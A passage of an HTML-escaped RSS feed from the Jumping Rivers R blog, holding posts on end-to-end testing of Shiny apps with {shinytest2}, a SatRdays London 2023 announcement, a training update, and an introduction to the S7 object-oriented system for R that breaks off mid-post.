&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/testthat/test-e2e-greeter_accepts_username.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# ... snip ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Only check the value of output$greeting&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With this, the values stored in the .json are more specific to this
test:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;output&amp;#34;&lt;/span&gt;: {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Rivers!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Similarly, you probably don’t want a behavioural test to start failing
when the look and feel of the app changes. To prevent {shinytest2} from
using snapshot images you can call
&lt;code&gt;app$expect_values(..., screenshot_args = FALSE)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now that our expected values are more specific to the test case, we can
update the stored snapshot files.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;snapshot_review&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;e2e-greeter_accepts_username/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you find yourself having to update the snapshot files for your tests
often, or you find that when you update these snapshot files, the
behaviour that you were testing seems to be working perfectly, you
should try restricting the set of variables that are being checked by
your tests (or preventing the tests from making pictures of your app).&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Here, we created a simple shiny application and showed how to record and
run tests against this app using {shinytest2}. The source code for the
application can be obtained from
&lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-shinytest2/part-2" rel="external"&gt;github&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The structure of a typical test case is similar to that used with
{testthat} but you must start the app running before interacting with it
or making any test assertions. The {shinytest2} recorder is able to
generate test code to go inside these test cases, and we showed how to
use the recorder with a packaged application. It is important to ensure
that your tests are restricted to only make assertions about the
behaviour of your application that is under scrutiny, so that your tests
only fail when that behaviour changes.&lt;/p&gt;
&lt;p&gt;The code generated here could be copied and modified to generate further
test cases. Doing this might add lots of duplication across your test
scripts making your tests harder to maintain. In the next post in this
series, we add a further test to the application and introduce some
design principles that help ensure that your test code supports, rather
than hinders, the further development of your application.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2023</title><link>https://www.jumpingrivers.com/blog/satrdays-london/</link><pubDate>Wed, 11 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SatRdays is returning to &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;London&lt;/a&gt; this April! SatRdays are low-cost R conferences, hosted on Saturdays to enable those who usually cannot attend to take part.&lt;/p&gt;
&lt;p&gt;Thanks to &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt;, SatRdays London will take place at Bush House, King&amp;rsquo;s College London. King’s Bush House buildings provide a home for many of their academic departments, as well as state-of-the-art learning and social spaces and enhanced student facilities. These buildings include lecture theatres, teaching rooms, a 395-seat auditorium, and The Exchange, an open, collaborative space designed for events and exhibitions.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-satrdays-london"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;p&gt;Our Keynote speaker is &lt;a href="https://juliasilge.com/" rel="external"&gt;Julia Silge&lt;/a&gt;, (&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; - formerly RStudio). Julia is a data scientist and software engineer at Posit PBC (formerly RStudio), working on open-source modelling and MLOps tools. She is an author, an international keynote speaker, and a real-world practitioner focusing on data analysis and machine learning. Julia loves text analysis, making beautiful charts, and communicating technical topics with diverse audiences.&lt;/p&gt;
&lt;p&gt;Abstract submission is now open until the end of 31st January 2023. If you&amp;rsquo;d like the opportunity to share your knowledge, head over to &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;the conference website&lt;/a&gt; to submit! Abstracts should be max. 250 words.&lt;/p&gt;
&lt;p&gt;Early bird registration is also available until 31st January, so get in now before the price rises!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>End-to-end testing with shinytest2: Part 1</title><link>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/</link><pubDate>Thu, 05 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the first of a series of three blog posts about using the
{shinytest2} package to develop automated tests for shiny applications.
In the posts we will cover&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;the purpose of browser-driven end-to-end tests for a shiny
developer, and tools (like {shinytest2}) that help implement them
(this post);&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/" rel="external"&gt;how to write and run a simple test using
{shinytest2}&lt;/a&gt;;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/" rel="external"&gt;how best to design your test code so that it supports your future
work&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Automated testing is an essential part of any production-quality
software project. Much of the focus in the R world, is on testing the
individual components of a project (the functions, classes etc), but for
those working with {shiny} applications there are great tools that can
test your application as if a user was interacting with it. In this blog
series, we focus on {shinytest2}, with which we can write tests from a
user’s perspective.&lt;/p&gt;
&lt;p&gt;But … test code is code: In an evolving project, it requires the same
care and maintenance as the rest of your source code. So try to ensure
that your test code is descriptive, and has sensible abstractions that
reduce future maintenance.&lt;/p&gt;
&lt;p&gt;Also … test code defines tests: If your tests pass when they shouldn’t,
or they fail for reasons outside of their remit or in unpredictable
ways, they aren’t doing their job properly. Reducing false positives and
false negatives (suitably defined) may be of as much value to the code
that presents your data analysis results as it is to the machine
learning model that generated them.&lt;/p&gt;
&lt;p&gt;Since these posts cover {shinytest2}, they assume some familiarity with
{shiny} and also with R package development. If you want to know a bit
more about these topics, there are some wonderful online resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the &lt;a href="https://shiny.rstudio.com/articles/" rel="external"&gt;RStudio (now Posit)&lt;/a&gt;
{shiny} articles,&lt;/li&gt;
&lt;li&gt;the &lt;a href="https://mastering-shiny.org/" rel="external"&gt;“Mastering Shiny”&lt;/a&gt; book,&lt;/li&gt;
&lt;li&gt;the &lt;a href="https://r-pkgs.org/" rel="external"&gt;“R Packages”&lt;/a&gt; book.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-end-to-end-testing-shinytest2-part-1"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="ui-based-end-to-end-testing"&gt;UI-based End-To-End Testing&lt;/h2&gt;
&lt;p&gt;{shiny} is a great tool for building interactive data-driven web
applications. Many of the apps built with shiny are quite simple, maybe
only a few hundred lines of code. But some apps are much &lt;em&gt;much bigger&lt;/em&gt;.
As a web application grows in complexity, the developer’s ability to
reason about all the different parts of that application evaporates.
This makes it harder to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;add new features (will the new code break existing functionality?)&lt;/li&gt;
&lt;li&gt;fix bugs (it’s hard to find the broken code in a complicated code
base)&lt;/li&gt;
&lt;li&gt;and onboard new developers.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As your app evolves over time, you should strive to keep the source code
as simple as possible. Good design, documentation and team-communication
can help, but one of the simplest ways to restrain the complexity of
your source code is by investing time to add automated testing.&lt;/p&gt;
&lt;p&gt;There are several levels at which you can test a shiny application. You
might:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;write unit tests to ensure your R (and possibly JavaScript)
functions work as expected;&lt;/li&gt;
&lt;li&gt;write reactivity tests for your back-end logic using
&lt;a href="https://shiny.rstudio.com/reference/shiny/1.5.0/testServer.html" rel="external"&gt;&lt;code&gt;testServer()&lt;/code&gt;&lt;/a&gt;
and the, relatively new,
&lt;a href="https://shiny.rstudio.com/reference/shiny/1.5.0/moduleServer.html" rel="external"&gt;&lt;code&gt;moduleServer&lt;/code&gt;&lt;/a&gt;
syntax;&lt;/li&gt;
&lt;li&gt;check that the app “works” before checking in your code, by opening
it in the browser and “clicking about a bit …”;&lt;/li&gt;
&lt;li&gt;or you might formalise the latter by writing some manual test
descriptions that define what should happen when the user interacts
with your app in their browser.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Between them, these steps will help prevent you from breaking your app,
identify issues that need to be fixed, and help demonstrate to clients
or colleagues how your app works or that newly requested features / bug
fixes have been implemented. This affords your developers more
confidence when they want to restructure and simplify the source code of
the app. So everyone wins.&lt;/p&gt;
&lt;p&gt;Manual testing (especially the non-exploratory kind) can get pretty
tedious though. It’s repetitive, it’s repetitive and it’s repetitive.
That’s why you should invest time automating those user-interface-based
(browser-side) end-to-end (app-focussed, not component-focussed) tests.&lt;/p&gt;
&lt;p&gt;There are many tools for writing tests at this level. Typically the
tools have two software components:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;a webdriver that interacts with the app in the browser (or a
headless version of a browser) thus mimicking how a user might
interact with the app;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;and a test / assertion library to compare the actual state of the
app to your expectations.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example tools in this space include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.cypress.io/" rel="external"&gt;cypress&lt;/a&gt;, &lt;a href="https://pptr.dev/" rel="external"&gt;puppeteer&lt;/a&gt;
and &lt;a href="https://playwright.dev/" rel="external"&gt;playwright&lt;/a&gt; (in JavaScript)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.selenium.dev/" rel="external"&gt;selenium&lt;/a&gt; (several languages, &lt;a href="https://docs.ropensci.org/RSelenium/" rel="external"&gt;including
R&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rstudio.github.io/shinytest2/" rel="external"&gt;shinytest2&lt;/a&gt; and
&lt;a href="https://rstudio.github.io/shinytest/" rel="external"&gt;shinytest&lt;/a&gt; (in R)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="shinytest2"&gt;{shinytest2}&lt;/h3&gt;
&lt;p&gt;{shinytest2} builds upon the {shinytest} package and was written by
Barret Schloerke and his colleagues at RStudio. Like puppeteer,
{shinytest2} uses the Chrome DevTools Protocol to interact with the
browser, which is a pretty stable basis for building a browser
automation tool (the predecessor {shinytest} was built on a
now-unsupported browser library called
&lt;a href="https://phantomjs.org/" rel="external"&gt;PhantomJS&lt;/a&gt;, so we strongly recommend migrating
to {shinytest2} if you are still using {shinytest}). Test scripts are
written in R and so should be accessible to R developers who are
comfortable with &lt;a href="https://testthat.r-lib.org/" rel="external"&gt;{testthat}&lt;/a&gt;. There is an
automated tool (described in the next post) for creating these test
scripts. Also, {shinytest2} understands the architecture of shiny apps,
and so it is simple to access the &lt;code&gt;input&lt;/code&gt; and &lt;code&gt;output&lt;/code&gt; variables that
are stored by a shiny app at any given time, the &lt;code&gt;input&lt;/code&gt;s can be
modified easily as well - to access these variables using the more
general UI-based end-to-end testing tools is much more difficult.&lt;/p&gt;
&lt;p&gt;Last, and by no means least, the documentation for {shinytest2} is
&lt;a href="https://rstudio.github.io/shinytest2/" rel="external"&gt;great&lt;/a&gt; and there are several
videos online that might help you get up to speed.&lt;/p&gt;
&lt;h3 id="a-warning"&gt;A warning&lt;/h3&gt;
&lt;p&gt;Although end-to-end tests written with {shinytest2} (or the other tools,
above) can provide good guarantees about the behaviour of a whole
application, there are some caveats associated with this kind of test.
Compared to component-focussed tests, they tend to be &lt;em&gt;much&lt;/em&gt; slower,
harder to write, more fragile (to changes in the code) and more flaky
(due to external dependencies, the network and so on). So use these
tests sparingly. If you can write a unit test that covers the same
behaviour, this may be a much better use of both your and your computers
time.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Here we have introduced browser-driven end-to-end tests as a way to
check that your shiny app behaves as expected. {shinytest2} is a new
tool allowing R developers to write this kind of test in R. These tests
do have some drawbacks - they can be slow and unpredictable. In
subsequent posts we will describe how to write tests using {shinytest2}
and introduce some software design approaches that make these tests a
bit more future-proof.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>December Training Update</title><link>https://www.jumpingrivers.com/blog/december-training-update/</link><pubDate>Tue, 20 Dec 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/december-training-update/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/december-training-update/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/december-training-update/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re thinking of picking up a new skill in the new year, take a look at our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;upcoming public training courses&lt;/a&gt;! We have plenty of introductory courses coming up, both online and in-person, so you can hit the ground running after the holidays!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-december-training-update"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="introduction-to-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;R is a versatile language for statistical computing and graphics. In &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;this course&lt;/a&gt; you will learn the advantages of using R and how to get started. You will gain familiarity with the RStudio interface and learn the R basics. Also included is an introduction to the Tidyverse and how to use various packages for data storage, visualisation and manipulation. This course provides a great foundation to begin your R journey!&lt;/p&gt;
&lt;h3 id="introduction-to-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is a &lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;one-day intensive course&lt;/a&gt; on Python and assumes no prior knowledge. By the end of the course, participants will be able to import, summarise and plot their data. At each step, we avoid using “magic code”, and stress the importance of understanding what Python is doing.&lt;/p&gt;
&lt;h3 id="introduction-to-shiny"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;Introduction to Shiny&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Do you want to provide interactive visualisation and data exploration features for users who do not have R and data science skills? &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;Discover how easy it can be&lt;/a&gt; to use R and {shiny} to create your own apps and dashboards for exploring data without relying on web development or external BI tools. We will show you various examples of input widgets and outputs to display tables and visualisations.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/december-training-update/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What is S7? A New OOP System for R</title><link>https://www.jumpingrivers.com/blog/r7-oop-object-oriented-programming-r/</link><pubDate>Thu, 15 Dec 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r7-oop-object-oriented-programming-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r7-oop-object-oriented-programming-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r7-oop-object-oriented-programming-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This blog post aims to give a brief introduction to S7, a new R package for OOP in R. It&amp;rsquo;s not a tutorial on how to write code using S7 - the &lt;a href="https://rconsortium.github.io/OOP-WG/index.html" rel="external"&gt;documentation&lt;/a&gt; provides great instructions for getting started if you&amp;rsquo;re already ready to start programming in S7.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Note&lt;/em&gt;&lt;/strong&gt;: This blog post has been updated to reflect the &lt;a href="https://github.com/RConsortium/OOP-WG/issues/262" rel="external"&gt;change in name&lt;/a&gt; from R7 to S7.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="what-is-oop"&gt;What is OOP?&lt;/h3&gt;
&lt;p&gt;Before we talk about S7, we should probably talk about OOP. OOP (short for Object Oriented Programming) is a programming framework that focuses on &lt;em&gt;objects&lt;/em&gt; and their interactions, rather than on the evaluation of functions (as in a functional programming framework). If you&amp;rsquo;re an R user, you&amp;rsquo;ve almost certainly used OOP approaches even if you haven&amp;rsquo;t realised it yet. For example, if you call &lt;code&gt;print()&lt;/code&gt; on a vector the output it returns is very different to the output it returns if you call &lt;code&gt;print()&lt;/code&gt; on a plot.&lt;/p&gt;
&lt;h3 id="oop-in-r"&gt;OOP in R&lt;/h3&gt;
&lt;p&gt;In typical object-oriented systems, each object is of a particular class (type) and has data and methods (object-specific functions) associated with it. The behaviour observed when a method is called depends on the class of the object that the method is associated with. There are multiple OOP systems that already exist in R, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;S3: the simplest and most commonly used object-oriented system, where the &lt;code&gt;class&lt;/code&gt; attribute defines the type of an object. S3 is widely used throughout base R so it’s important to know about it if you want to extend functions to work with different inputs. Its name comes from version 3 of the S language!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;S4: similar to S3 but includes more formal class definitions and validation. In S4, the data contained in an object is defined by the &lt;em&gt;slots&lt;/em&gt; in the class definition. S4 is a bit more complicated than S3 but results in better guarantees. S4 isn&amp;rsquo;t quite as widely used as S3, though the Bioconductor community is a long-term user of S4, so it&amp;rsquo;s important to know if you want to contribute to Bioconductor packages. The {lme4} package and some spatial packages (including {sp}, {rgdal}, and {rgeos}), also make use of S4 classes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Reference Classes (RC): a special type of S4 that also allows objects to be modified in place. Reference classes have very low adoption within the R community, and are not widely used.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;R6: similar to RC but simpler to use, and which uses S3 instead of S4. Unlike the previous OOP systems mentioned, &lt;a href="https://r6.r-lib.org/" rel="external"&gt;R6&lt;/a&gt; is a package rather than part of base R. It&amp;rsquo;s primarily been developed by Posit (formerly RStudio) and is used within the Shiny package.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r7-oop-object-oriented-programming-r"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;This blog post doesn&amp;rsquo;t aim to go into the details about object-oriented systems in R, and I&amp;rsquo;d recommend reading the Object Oriented chapters of &lt;a href="https://adv-r.hadley.nz/oo.html" rel="external"&gt;Advanced R&lt;/a&gt; for more details.&lt;/p&gt;
&lt;p&gt;So if we already have all these OOP systems in R, why do we need another one? You can watch &lt;a href="https://www.youtube.com/watch?v=P3FxCvSueag" rel="external"&gt;Hadley Wickham&amp;rsquo;s talk&lt;/a&gt; from rstudio::conf(2022) for some more background information on the motivation for developing S7.&lt;/p&gt;
&lt;img src="xkcd.png" style="width: 60%; display: block; margin-left: auto; margin-right: auto" alt="XKCD comic 927 showing how standards proliferate" /&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Image: &lt;a href="https://xkcd.com/927"&gt;xkcd.com/927&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3 id="what-is-s7"&gt;What is S7?&lt;/h3&gt;
&lt;p&gt;The two main OOP systems in R, S3 and S4, both have their advantages and their limitations. For example, in S3 there&amp;rsquo;s no systematic object validation to make sure an object&amp;rsquo;s class is correct. In S4, the syntax for defining classes is rather unusual and relies on side effects. Issues such as these mean that, unlike other programming languages, there isn&amp;rsquo;t a dominant approach to OOP in R.&lt;/p&gt;
&lt;p&gt;Now imagine you could take the best bits of S3 and the best bits of S4. That&amp;rsquo;s where S7 comes in. The S7 package is a new OOP system designed to be a successor to S3 and S4. Unlike S3 and S4 (which were developed for S), S7 is specifically developed for R. S7 is currently being developed by The R Consortium Working Group on OOP. The long-term goal is to merge S7 into base R.&lt;/p&gt;
&lt;p&gt;You can install the development version of S7 from &lt;a href="https://github.com/RConsortium/OOP-WG" rel="external"&gt;GitHub&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;remotes&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rconsortium/OOP-WG&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;S7&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="defining-a-class-in-s7"&gt;Defining a class in S7&lt;/h3&gt;
&lt;p&gt;S7 classes are defined formally, and the definition includes a list of properties and a (optional) validator. You can use the (intuitively named) &lt;code&gt;new_class()&lt;/code&gt; function to define a new S7 class. For example, if we want to define a simple S7 class with two properties about breakfast cereals (their &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;year_of_launch&lt;/code&gt;) we can use the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cereal &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;new_class&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cereal&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; properties &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; class_character,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year_of_launch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; class_numeric
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It&amp;rsquo;s not a coincidence that we&amp;rsquo;ve assigned the new class to an object with the same name as the class. It&amp;rsquo;s how we construct new instances of the &lt;code&gt;cereal&lt;/code&gt; class. For example, to construct an instance of the &lt;code&gt;cereal&lt;/code&gt; class, you call &lt;code&gt;cereal()&lt;/code&gt;, and pass in the values of the properties as arguments:&lt;/p&gt;
